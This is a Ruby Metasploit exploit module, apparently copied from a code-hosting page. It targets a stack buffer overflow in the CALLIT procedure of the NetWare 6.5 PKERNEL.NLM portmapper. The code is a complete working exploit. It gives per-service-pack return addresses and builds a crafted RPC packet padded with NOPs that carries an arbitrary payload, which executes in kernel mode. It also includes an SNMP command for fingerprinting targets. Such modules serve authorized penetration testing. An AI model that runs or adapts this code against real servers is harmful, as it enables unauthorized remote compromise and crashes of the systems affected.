92 lines
3.5 KiB
Ruby
92 lines
3.5 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
|
|
include Msf::Exploit::Remote::Udp
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.
|
|
PKERNEL.NLM is installed by default on all NetWare servers to support NFS.
|
|
The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can
|
|
cause the operating system to reboot.
|
|
},
|
|
'Author' => [ 'pahtzo', ],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
# There is no CVE for this vulnerability
|
|
[ 'BID', '36564' ],
|
|
[ 'OSVDB', '58447' ],
|
|
[ 'ZDI', '09-067' ],
|
|
],
|
|
'Privileged' => true,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 2020,
|
|
},
|
|
'Platform' => 'netware',
|
|
'Targets' =>
|
|
[
|
|
# NetWare SP and PKERNEL.NLM version can be found in SNMP:
|
|
# snmpwalk -Os -c public -v 1 [target hostname] | egrep -i "sysdescr|pkernel.nlm"
|
|
# sysDescr.0 = STRING: Novell NetWare 5.70.08 October 3, 2008
|
|
# hrSWRunName.1191394992 = STRING: "PKERNEL.NLM v15.01 (20081014)"
|
|
[ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
|
|
[ 'NetWare 6.5 SP8', { 'Ret' => 0x823C870C } ], # push esp - ret (libc.nlm)
|
|
],
|
|
|
|
'DisclosureDate' => 'Sep 30 2009'))
|
|
|
|
register_options([Opt::RPORT(111)], self.class)
|
|
end
|
|
|
|
def exploit
|
|
connect_udp
|
|
|
|
buf = [rand(0xffffffff)].pack('N') # XID
|
|
buf << [0].pack('N') # Message Type: Call (0)
|
|
buf << [2].pack('N') # RPC Version: 2
|
|
buf << [100000].pack('N') # Program: Portmap (100000)
|
|
buf << [2].pack('N') # Program Version: 2
|
|
buf << [5].pack('N') # Procedure: CALLIT (5)
|
|
buf << [0].pack('N') # Credentials AUTH_NULL (0)
|
|
buf << [0].pack('N') # Length: 0
|
|
buf << [0].pack('N') # Verifier AUTH_NULL (0)
|
|
buf << [0].pack('N') # Length: 0
|
|
buf << [0].pack('N') # Program: Unknown (0)
|
|
buf << [1].pack('N') # Version: 1
|
|
buf << [1].pack('N') # Procedure: proc-1 (1)
|
|
buf << [4097].pack('N') # Arguments: <DATA> length: 4097
|
|
|
|
buf << make_nops(2072) # fill to ret
|
|
buf << [target.ret].pack('V') # addr. of push esp - ret
|
|
buf << payload.encoded #
|
|
|
|
# print_status("payload space #{payload_space()}...")
|
|
# print_status("payload len #{payload.encoded.length}...")
|
|
# print_status("total buf len #{buf.length}...")
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
udp_sock.put(buf)
|
|
handler
|
|
disconnect_udp
|
|
end
|
|
|
|
end
|